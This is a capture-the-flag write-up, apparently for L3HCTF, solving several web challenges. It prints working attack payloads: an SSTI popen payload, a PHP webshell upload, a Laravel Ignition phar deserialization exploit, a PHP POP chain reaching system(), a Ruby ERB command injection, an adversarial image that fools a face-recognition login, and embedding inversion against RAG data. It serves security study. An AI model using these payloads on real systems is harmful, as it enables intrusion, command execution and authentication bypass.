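赛博侦探 (Cyber Detective)

Capturing the traffic on the bilibili link reveals the `/secret/find_my_password` route. The script below estimates the target's coordinates from five reference points and their distances.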

```python
import numpy as np
from scipy.optimize import minimize

# Reference points as (longitude, latitude)
points = np.array([
    [114.195324, 30.611436],
    [114.202718, 30.634363],
    [114.162743, 30.643873],
    [114.147891, 30.632255],
    [114.141771, 30.624681],
])
# Distance from the target to each reference point, in km
distances = np.array([2.3, 2.8, 2.5, 2.5, 3.2])
R = 6371.0  # Earth radius in km


def haversine(lon1, lat1, lon2, lat2):
    """Great-circle distance between two points (unit: km)."""
    lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])
    dlon = lon2 - lon1
    dlat = lat2 - lat1
    a = np.sin(dlat / 2.0) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon / 2.0) ** 2
    c = 2 * np.arcsin(np.sqrt(a))
    return R * c


def objective_function(target):
    """Objective: sum of squared distance errors."""
    lon, lat = target
    total_error = 0.0
    for i in range(len(points)):
        dist_calculated = haversine(lon, lat, points[i, 0], points[i, 1])
        error = dist_calculated - distances[i]
        total_error += error ** 2
    return total_error


# Start from the centroid of the reference points
initial_guess = np.mean(points, axis=0)
result = minimize(objective_function, initial_guess, method='L-BFGS-B')

target_lon = round(result.x[0], 6)
target_lat = round(result.x[1], 6)
print(f"Target coordinates (lon, lat): ({target_lon}, {target_lat})")
```
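For reference, the quantity the script minimizes can be written out as follows. The symbols are notation introduced here, not taken from the challenge: $(\lambda, \varphi)$ is the unknown longitude and latitude in radians, $(\lambda_i, \varphi_i)$ are the five reference points, $d_i$ are the given distances in km, and $R = 6371$ km.

$$
\begin{aligned}
a_i &= \sin^2\!\left(\frac{\varphi_i - \varphi}{2}\right) + \cos\varphi\,\cos\varphi_i\,\sin^2\!\left(\frac{\lambda_i - \lambda}{2}\right),\\
h_i(\lambda,\varphi) &= 2R\,\arcsin\sqrt{a_i},\\
(\hat\lambda,\hat\varphi) &= \arg\min_{\lambda,\varphi}\ \sum_{i=1}^{5}\bigl(h_i(\lambda,\varphi) - d_i\bigr)^2 .
\end{aligned}
$$

The first two lines are what `haversine` computes, and the last line is `objective_function` handed to `minimize`.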

After the redirect to the new page, the flag can be read directly with a directory traversal.

best_profile

Start with the source code. app.py contains the following:

```python
@app.route("/get_last_ip/<string:username>", methods=["GET", "POST"])
def route_check_ip(username):
    if not current_user.is_authenticated:
        return "You need to login first."
    user = User.query.filter_by(username=username).first()
    if not user:
        return "User not found."
    return render_template("last_ip.html", last_ip=user.last_ip)


geoip2_reader = geoip2.database.Reader("GeoLite2-Country.mmdb")


@app.route("/ip_detail/<string:username>", methods=["GET"])
def route_ip_detail(username):
    res = requests.get(f"http://127.0.0.1/get_last_ip/{username}")
    if res.status_code != 200:
        return "Get last ip failed."
    last_ip = res.text
    try:
        ip = re.findall(r"\d+\.\d+\.\d+\.\d+", last_ip)
        country = geoip2_reader.country(ip)
    except (ValueError, TypeError):
        country = "Unknown"
    template = f"""
    <h1>IP Detail</h1>
    <div>{last_ip}</div>
    <p>Country:{country}</p>
    """
    return render_template_string(template)

...

@app.after_request
def set_last_ip(response):
    if current_user.is_authenticated:
        current_user.last_ip = request.remote_addr
        db.session.commit()
    return response
```



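The logic here: `/ip_detail/<username>` first requests http://127.0.0.1/get_last_ip/{username} and then feeds the returned `res.text` into `render_template_string`, so an SSTI can be built here. According to the final `set_last_ip()`, `last_ip` can be controlled through the X-Forwarded-For (XFF) header. The main obstacle is that the `requests.get` call carries no session, so every internal request comes back as "You need to login first."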

Note this part of nginx.conf:

```nginx
location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$ {
    proxy_ignore_headers Cache-Control Expires Vary Set-Cookie;
    proxy_pass http://127.0.0.1:5000;
    proxy_cache static;
    proxy_cache_valid 200 302 30d;
}

location ~ .*\.(js|css)?$ {
    proxy_ignore_headers Cache-Control Expires Vary Set-Cookie;
    proxy_pass http://127.0.0.1:5000;
    proxy_cache static;
    proxy_cache_valid 200 302 12h;
}
```

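Responses for paths with these suffixes are cached by nginx, so later requests for the same path are served from the cache instead of reaching the Flask application. That sidesteps the login check.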
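A quick way to see which paths fall into the caching locations is to run the two regexes from the excerpt against candidate paths. This is only a sketch: it assumes Python's `re` behaves like nginx's PCRE for these simple patterns, and the helper name `is_cached` is made up for illustration.

```python
import re

# The two location regexes, copied from the nginx.conf excerpt.
CACHED_LOCATIONS = [
    re.compile(r".*\.(gif|jpg|jpeg|png|bmp|swf)$"),
    re.compile(r".*\.(js|css)?$"),
]


def is_cached(path: str) -> bool:
    """Return True if the path matches one of the caching locations."""
    return any(rx.search(path) for rx in CACHED_LOCATIONS)


# A username ending in a listed suffix makes the route cacheable.
print(is_cached("/get_last_ip/2.swf"))
# An ordinary username does not.
print(is_cached("/get_last_ip/alice"))
```

Because the username is part of the path, choosing a name such as 2.swf is enough to route `/get_last_ip/<username>` through the cache.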



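First register and log in normally with the username 2.swf (any suffix from the list works). Once on the home page, head for get_last_ip/2.swf, but intercept the request first: add the XFF header and send it to a wrong route so that `set_last_ip()` fires. Because of the cache this is a one-shot operation; if anything goes wrong, the only option is to register and log in again.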

Then request the correct route once more so that the XFF value ends up in last_ip.





With last_ip set, visiting ip_detail/2.swf renders it successfully. The same procedure applies to every later payload.
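The order of requests matters, so here is a sketch that only builds them (nothing is sent). The host, the nonexistent route name, and the placeholder payload are assumptions for illustration; the session cookie from the login is omitted, and keeping the XFF header on the second request is also an assumption.

```python
from urllib.request import Request

BASE = "http://target.example"  # hypothetical host
USERNAME = "2.swf"              # username used in the write-up
PAYLOAD = "{{7*7}}"             # placeholder template expression (assumption)


def build_requests(base: str, username: str, payload: str) -> list[Request]:
    """Build, but do not send, the three requests in the order described."""
    xff = {"X-Forwarded-For": payload}
    return [
        # 1. A wrong route: per the write-up this triggers set_last_ip().
        Request(f"{base}/no-such-route", headers=xff),
        # 2. The real route: this response is the one nginx caches.
        Request(f"{base}/get_last_ip/{username}", headers=xff),
        # 3. The internal fetch is served from the cache and then rendered.
        Request(f"{base}/ip_detail/{username}"),
    ]


for req in build_requests(BASE, USERNAME, PAYLOAD):
    print(req.get_method(), req.full_url)
```

Since the cached entry cannot be overwritten from the outside, each new payload needs a fresh username.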

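Testing the SSTI showed that quote characters are filtered. This can be bypassed by passing the strings in through request parameters instead: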

```
X-Forwarded-For:{{lipsum.__globals__[request.args.a].popen(request.args.b).read()}}

a=os&b=tac /flag
```
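The template reads `request.args.a` and `request.args.b`, so the two strings travel in the query string of the request that renders the template, which per the source above is `/ip_detail/<username>`. A minimal sketch of the encoding, assuming the username 2.swf from the earlier steps:

```python
from urllib.parse import urlencode

# Values from the write-up; the filtered quotes never appear in the template itself.
params = {"a": "os", "b": "tac /flag"}
query = urlencode(params)

# Path of the request that triggers rendering (username is the one registered earlier).
url = "/ip_detail/2.swf?" + query
print(url)
```

`urlencode` percent-encodes the slash and turns the space into `+`, both of which Flask decodes back before the template sees them.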

gogogo出发喽

I did not understand this one, so for now this section follows SU's write-up.



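The password can be brute-forced: it is admin888. Getting a shell works locally, but logging in to the remote admin panel fails with a 419 error. Debug mode is enabled: requesting /_ignition/health-check returns {"can_execute_commands":true}. Next, look at MakeViewVariableOptionalSolution.php.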

Generate the malicious payload with phpggc:

```shell
php -d "phar.readonly=0" ./phpggc Laravel/RCE5 "phpinfo();" --phar phar -o /tmp/phar.gif

cat /tmp/phar.gif | base64 -w 0
```



Exploiting the CVE directly did not work. Auditing the code turned up a file upload endpoint:

```http
POST /api/image/base64 HTTP/1.1
Host: 1.95.8.146:41164
Content-Length: 169
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Origin: http://1.95.8.146:41164
Referer: http://1.95.8.146:41164/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"data": "data:image/jpeg;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+"}
```
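To see what this test upload actually carries, the data URI from the request body can be decoded. A small sketch using only the standard library:

```python
import base64

# The "data" value from the request body above.
data_uri = "data:image/jpeg;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+"

# Split the declared media type from the base64 payload.
header, _, encoded = data_uri.partition(",")
decoded = base64.b64decode(encoded)

print(header)
print(decoded.decode())
```

The declared type is image/jpeg, but the content is a one-line PHP webshell, so the request probes whether the endpoint stores arbitrary bytes.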



The upload succeeds. Next, try writing the phar file:

```http
POST /_ignition/execute-solution HTTP/1.1
Host: 1.95.8.146:41164
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{
"viewFile":"phar:///var/www/html/public/uploads/images/_uc40mzhOJ6cNEKoF.jpeg/test.txt",
"variableName":"test"
}}
```

Testing showed that fast_destruct is enough to get around this. The script that repairs the signature:

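```python
from hashlib import sha1

with open('phar.gif', 'rb') as file:
    f = file.read()

s = f[:-28]  # everything before the 20-byte SHA-1 and the 8-byte trailer
h = f[-8:]   # trailer, kept unchanged
newf = s + sha1(s).digest() + h  # recompute the signature over the data

with open('phar1.gif', 'wb') as file:
    file.write(newf)
```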
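The offsets in the script follow from the phar trailer layout: a 20-byte SHA-1 digest, then a 4-byte signature type, then the 4-byte magic `GBMB`. The sketch below does the same re-signing in memory on a synthetic blob. It assumes a SHA-1-signed archive, which is what the 28-byte offset implies; `resign` and the fake data are illustrative names only.

```python
from hashlib import sha1

SIG_LEN = 20     # SHA-1 digest size
TRAILER_LEN = 8  # 4-byte signature type + 4-byte "GBMB" magic


def resign(phar: bytes) -> bytes:
    """Recompute the SHA-1 signature over everything before it."""
    body = phar[:-(SIG_LEN + TRAILER_LEN)]
    trailer = phar[-TRAILER_LEN:]
    return body + sha1(body).digest() + trailer


# Synthetic stand-in for a modified archive with a stale (zeroed) signature.
fake = b"stub-and-manifest" + b"\x00" * SIG_LEN + b"\x02\x00\x00\x00GBMB"
fixed = resign(fake)
print(fixed[-28:-8].hex())
```

Any edit to the serialized metadata invalidates the digest, so the signature has to be recomputed before PHP will open the archive.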

With a shell in hand, the privileges turn out to be insufficient; SUID privilege escalation solves that:

```shell
openssl enc -in "/flag_gogogo_chufalong"
```



Tellmewhy

A Java challenge built on the Solon framework, with a fastjson2 dependency.





The /baby/why route contains a deserialization sink.

The custom objectStream defines a deserialization blacklist:

javax.management.BadAttributeValueExpException

javax.swing.event.EventListenerList

javax.swing.UIDefaults$TextAndMnemonicHashMap



The intent is presumably to block chains of the form HashMap -> fastjson2.JSONArray. Running tabby shows that a chain through XString is still usable.

LookingMyEyes

.NET deserialization, which I had never come across before.

gateway_advance

See https://sakuraraindrop.github.io/2025/07/13/20250713%E9%9A%8F%E7%BC%98%E5%88%B7%E9%A2%98/

Please Sign In

```python
import uvicorn
import torch
import json
import os
from fastapi import FastAPI, File, UploadFile
from PIL import Image
from torchvision import transforms
from torchvision.models import shufflenet_v2_x1_0, ShuffleNet_V2_X1_0_Weights

feature_extractor = shufflenet_v2_x1_0(weights=ShuffleNet_V2_X1_0_Weights.IMAGENET1K_V1)
feature_extractor.fc = torch.nn.Identity()
feature_extractor.eval()

weights = ShuffleNet_V2_X1_0_Weights.IMAGENET1K_V1
transform = transforms.Compose([
    transforms.ToTensor(),
])

if not os.path.exists("embedding.json"):
    user_image = Image.open("user_image.jpg").convert("RGB")
    user_image = transform(user_image).unsqueeze(0)
    with torch.no_grad():
        user_embedding = feature_extractor(user_image)[0]
    with open("embedding.json", "w") as f:
        json.dump(user_embedding.tolist(), f)

user_embedding = json.load(open("embedding.json", "r"))
user_embedding = torch.tensor(user_embedding, dtype=torch.float32)
user_embedding = user_embedding.unsqueeze(0)

app = FastAPI()


@app.post("/signin/")
async def signin(file: UploadFile = File(...)):
    submit_image = Image.open(file.file).convert("RGB")
    submit_image = transform(submit_image).unsqueeze(0)
    with torch.no_grad():
        submit_embedding = feature_extractor(submit_image)[0]
    diff = torch.mean((user_embedding - submit_embedding) ** 2)
    result = {
        "status": "L3HCTF{test_flag}" if diff.item() < 5e-6 else "failure"
    }
    return result


@app.get("/")
async def root():
    return {"message": "Welcome to the Face Recognition API!"}


if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8000)
```

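This is an adversarial-example problem. A few pitfalls:

Normalization is generally unnecessary; the server's transform is only ToTensor(), so adding it actually breaks things.

In fake_img.clamp_(0, 1), the trailing underscore marks an in-place operation: the tensor itself is modified rather than a new tensor being returned.

Saving the image as JPG fails because of lossy compression; saving as PNG works.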
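PNG keeps the 8-bit pixel values exactly, but the optimized tensor holds floats, so saving still rounds every pixel to one of 256 levels. The sketch below bounds that error in plain Python. It assumes a truncating float-to-uint8 conversion; the helper names are made up for illustration.

```python
def to_uint8(x: float) -> int:
    """Clamp to [0, 1] and truncate to an 8-bit level (assumed behaviour)."""
    return int(max(0.0, min(1.0, x)) * 255)


def roundtrip(x: float) -> float:
    """Value seen after saving to an 8-bit image and loading it back."""
    return to_uint8(x) / 255


pixels = [0.0, 0.1234, 0.5, 0.9999, 1.0]
errors = [abs(roundtrip(p) - p) for p in pixels]
print(max(errors))
```

The per-pixel error stays below 1/255, which is small but not zero. That is a good reason to reload the saved file and recompute the loss before submitting, as exp.py does.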

exp.py

```python
import torch
import json
from torchvision.models import shufflenet_v2_x1_0, ShuffleNet_V2_X1_0_Weights
from torchvision import transforms
from PIL import Image
import requests

TARGET_EMBEDDING_FILE = "embedding.json"
OUTPUT_IMAGE_FILE = "payload.png"
IMAGE_SIZE = 224
LEARNING_RATE = 0.01
ITERATIONS = 2000
SUCCESS_THRESHOLD = 5e-6


def gen_payload():
    device = torch.device("mps" if torch.backends.mps.is_available() else "cpu")
    print(f"Using device: {device}")

    # Same feature extractor as the server
    feature_extractor = shufflenet_v2_x1_0(weights=ShuffleNet_V2_X1_0_Weights.IMAGENET1K_V1)
    feature_extractor.fc = torch.nn.Identity()
    feature_extractor.eval()
    feature_extractor.to(device)

    with open(TARGET_EMBEDDING_FILE, 'r') as f:
        target_embedding_list = json.load(f)
    target_embedding = torch.tensor(target_embedding_list, dtype=torch.float32).unsqueeze(0)
    target_embedding = target_embedding.to(device)

    # Optimize the pixels directly, starting from random noise
    generated_image = torch.rand(1, 3, IMAGE_SIZE, IMAGE_SIZE, device=device, requires_grad=True)
    optimizer = torch.optim.Adam([generated_image], lr=LEARNING_RATE)
    loss_fn = torch.nn.MSELoss()

    print("\nStarting optimization...")
    for i in range(ITERATIONS):
        optimizer.zero_grad()
        cur_embedding = feature_extractor(generated_image)
        loss = loss_fn(cur_embedding, target_embedding)
        loss.backward()
        optimizer.step()
        with torch.no_grad():
            generated_image.clamp_(0, 1)  # in place: keep pixels in the valid range
        if i % 100 == 0 or i == ITERATIONS - 1:
            print(f"Iteration {i:04d}/{ITERATIONS} | Loss (MSE): {loss.item():.10f}")
        if loss.item() < SUCCESS_THRESHOLD:
            print(f"\nSuccess! Loss is below the threshold at iteration {i}.")
            break
    print("\nOptimization finished.")

    fin_img_tensor = generated_image.squeeze(0).cpu().detach()
    to_pil = transforms.ToPILImage()
    fin_img_pil = to_pil(fin_img_tensor)
    fin_img_pil.save(OUTPUT_IMAGE_FILE)
    print(f"[+] Payload image saved to {OUTPUT_IMAGE_FILE}")

    # Reload the saved file to check that it still passes the threshold
    print("[+] Verifying the generated payload...")
    verify_img = Image.open(OUTPUT_IMAGE_FILE).convert("RGB")
    trans_verify = transforms.Compose([transforms.ToTensor()])
    verify_tensor = trans_verify(verify_img).unsqueeze(0).to(device)
    with torch.no_grad():
        final_embedding = feature_extractor(verify_tensor)
    final_diff = loss_fn(final_embedding, target_embedding)
    print(f"[+] Final difference with saved image: {final_diff.item():.10f}")
    if final_diff.item() < SUCCESS_THRESHOLD:
        print("[+] 🥳")
    else:
        print("[-] 🥲")


if __name__ == "__main__":
    gen_payload()
    try:
        server_url = "http://1.95.8.146:50001/signin/"
        files = {'file': open(OUTPUT_IMAGE_FILE, 'rb')}
        response = requests.post(server_url, files=files)
        print("Server response:", response.json())
    except Exception as e:
        print("Error while submitting to the server:", e)
        print(f"Please upload {OUTPUT_IMAGE_FILE} to the server manually to get the flag")
```

LearnRag

```python
import vec2text
import torch
from transformers import AutoModel, AutoTokenizer, PreTrainedTokenizer, PreTrainedModel
import pickle


class RagData:
    def __init__(self, embedding_model=None, embeddings=None):
        self.embedding_model = embedding_model
        self.embeddings = embeddings or []


def get_gtr_embeddings(text_list,
                       encoder: PreTrainedModel,
                       tokenizer: PreTrainedTokenizer) -> torch.Tensor:
    inputs = tokenizer(text_list,
                       return_tensors="pt",
                       max_length=128,
                       truncation=True,
                       padding="max_length",).to("cuda")

    with torch.no_grad():
        model_output = encoder(input_ids=inputs['input_ids'], attention_mask=inputs['attention_mask'])
        hidden_state = model_output.last_hidden_state
        embeddings = vec2text.models.model_utils.mean_pool(hidden_state, inputs['attention_mask'])

    return embeddings


encoder = AutoModel.from_pretrained("sentence-transformers/gtr-t5-base").encoder.to("cuda")
tokenizer = AutoTokenizer.from_pretrained("sentence-transformers/gtr-t5-base")
corrector = vec2text.load_pretrained_corrector("gtr-base")

with open('rag_data.pkl', 'rb') as f:
    rag_data = pickle.load(f)

embeddings = rag_data.embeddings
embeddings = torch.tensor(embeddings)

# Inspect the data structure
print(embeddings.shape)

vec2text.invert_embeddings(
    embeddings=embeddings.cuda(),
    corrector=corrector,
    num_steps=20,
)
```

ez_pop

```php
<?php
error_reporting(0);
highlight_file(__FILE__);

class class_A
{
    public $s;
    public $a;

    public function __toString()
    {
        echo "2 A <br>";
        $p = $this->a;
        return $this->s->$p;
    }
}

class class_B
{
    public $c;
    public $d;

    function is_method($input)
    {
        if (strpos($input, '::') === false) {
            return false;
        }
        [$class, $method] = explode('::', $input, 2);
        if (!class_exists($class, false)) {
            return false;
        }
        if (!method_exists($class, $method)) {
            return false;
        }
        try {
            $refMethod = new ReflectionMethod($class, $method);
            return $refMethod->isInternal();
        } catch (ReflectionException $e) {
            return false;
        }
    }

    function is_class($input)
    {
        if (strpos($input, '::') !== false) {
            return $this->is_method($input);
        }
        if (!class_exists($input, false)) {
            return false;
        }
        try {
            return (new ReflectionClass($input))->isInternal();
        } catch (ReflectionException $e) {
            return false;
        }
    }

    public function __get($name)
    {
        echo "2 B <br>";
        $a = $_POST['a'];
        $b = $_POST;
        $c = $this->c;
        $d = $this->d;
        if (isset($b['a'])) {
            unset($b['a']);
        }
        if ($this->is_class($a)) {
            call_user_func($a, $b)($c)($d);
        } else {
            // "You really should go ask oSthinggg for help"
            die("你真该请教一下oSthinggg哥哥了");
        }
    }
}

class class_C
{
    public $c;

    public function __destruct()
    {
        echo "2 C <br>";
        echo $this->c;
    }
}

if (isset($_GET['un'])) {
    $a = unserialize($_GET['un']);
    // "noooooob!!! You really should go ask almighty Google"
    throw new Exception("noooooob!!!你真该请教一下万能的google哥哥了");
}
```



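The POP chain itself is simple. The real question is how to get RCE out of `call_user_func($a, $b)($c)($d);`.

`$a` must be an internal class or a static method of an internal class, `$b` is the `$_POST` array with the `a` key removed, and `$c` and `$d` are fully controllable.

Some searching shows that `Closure::fromCallable` can be used to call a function and run a command: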

```php
Closure::fromCallable("system")("whoami");
```

The following form raises an error but still runs the command:

```php
call_user_func('Closure::fromCallable', "system")('whoami')();
```

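However, `$b` is the `$_POST` array, so passing the argument this way does not work and keeps raising errors.

The next idea is to nest the call and invoke `Closure::fromCallable` a second time, like this: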

```php
call_user_func('Closure::fromCallable', "Closure::fromCallable")('system')('whoami');
```

Since `$b` is an array, `Closure::fromCallable` cannot be passed in as one string; it has to be split into its class and method parts:

```php
<?php
$b[0] = 'Closure';
$b[1] = 'fromCallable';
$c = 'system';
$d = 'whoami';

var_dump($b);
call_user_func('Closure::fromCallable', $b)($c)($d);
```

So the final payload looks like this:

```
?un=O:7:"class_C":1:{s:1:"c";O:7:"class_A":2:{s:1:"s";O:7:"class_B":2:{s:1:"c";s:6:"system";s:1:"d";s:6:"whoami";}s:1:"a";s:1:"x";}

POST:
a=Closure::fromCallable&0=Closure&1=fromCallable
```
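The serialized string can also be generated rather than typed by hand. The sketch below rebuilds it in Python; `php_str` and `php_obj` are small helpers written for this illustration, not part of any library. The payload above omits the final closing brace, and the sketch reproduces that. The omission presumably makes the objects get destroyed as soon as `unserialize` fails, before the exception is thrown, although the write-up does not say so.

```python
from urllib.parse import urlencode


def php_str(value: str) -> str:
    """Serialize a PHP string: s:<byte length>:"<value>";"""
    return f's:{len(value.encode())}:"{value}";'


def php_obj(cls: str, props: dict[str, str]) -> str:
    """Serialize an object whose property values are already serialized."""
    body = "".join(php_str(name) + value for name, value in props.items())
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'


# class_C::__destruct -> class_A::__toString -> class_B::__get
class_b = php_obj("class_B", {"c": php_str("system"), "d": php_str("whoami")})
class_a = php_obj("class_A", {"s": class_b, "a": php_str("x")})
class_c = php_obj("class_C", {"c": class_a})

payload = class_c[:-1]  # drop the last brace, as in the write-up's payload
post_body = urlencode({"a": "Closure::fromCallable", "0": "Closure", "1": "fromCallable"})

print(payload)
print(post_body)
```

Changing the command only requires replacing "whoami"; the length prefix is recomputed automatically.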

ez_ruby

```ruby
require "sinatra"
require "erb"
require "json"

class User
  attr_reader :name, :age

  def initialize(name="oSthinggg", age=21)
    @name = name
    @age = age
  end

  def is_admin?
    if to_s == "true"
      "a admin,good!give your fake flag! flag{RuBy3rB_1$_s3_1Z}"
    else
      "not admin,your " + @to_s
    end
  end

  def age
    if @age > 20
      "old"
    else
      "young"
    end
  end

  def merge(original, additional, current_obj = original)
    additional.each do |key, value|
      if value.is_a?(Hash)
        next_obj = current_obj.respond_to?(key) ? current_obj.public_send(key) : Object.new
        current_obj.singleton_class.attr_accessor(key) unless current_obj.respond_to?(key)
        current_obj.instance_variable_set("@#{key}", next_obj)
        merge(original, value, next_obj)
      else
        current_obj.singleton_class.attr_accessor(key) unless current_obj.respond_to?(key)
        current_obj.instance_variable_set("@#{key}", value)
      end
    end
    original
  end
end

user = User.new("oSthinggg", 21)

get "/" do
  redirect "/set_age"
end

get "/set_age" do
  ERB.new(File.read("views/age.erb", encoding: "UTF-8")).result(binding)
end

post "/set_age" do
  request.body.rewind
  age = JSON.parse(request.body.read)
  user.merge(user, age)
end

get "/view" do
  name = user.name().to_s
  op_age = user.age().to_s
  is_admin = user.is_admin?().to_s
  ERB::new("<h1>Hello,oSthinggg!#{op_age} man!you #{is_admin}</h1>").result
end
```

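I have not done many Ruby challenges. At first I assumed this was like prototype pollution in JavaScript: pollute the return value of the to_s method to "true", become admin, and collect the flag. That never worked; it seems only the @to_s instance variable can be changed. Only later did I realize this is an ERB template injection.

Pollute the @to_s instance variable with an ERB tag that runs a command, then visit the /view route: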

```json
{"to_s":"<%=`cat /proc/self/environ`%>"}
```
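Why this works can be traced through the source: `merge` stores the value in `@to_s`, `is_admin?` appends `@to_s` to its return string, and `/view` interpolates that string into the template text before calling `ERB::new(...).result`, so the `<%= ... %>` tag is evaluated. A small sketch that builds the request body for `POST /set_age`; the variable names are illustrative:

```python
import json

# Command to run on the server; any shell command could go here.
command = "cat /proc/self/environ"

# ERB output tag wrapping a Ruby backtick (shell) expression.
erb_payload = "<%=`" + command + "`%>"

# Compact separators reproduce the body shown in the write-up.
body = json.dumps({"to_s": erb_payload}, separators=(",", ":"))
print(body)
```

After posting this body, a GET to /view returns the command output inside the rendered page.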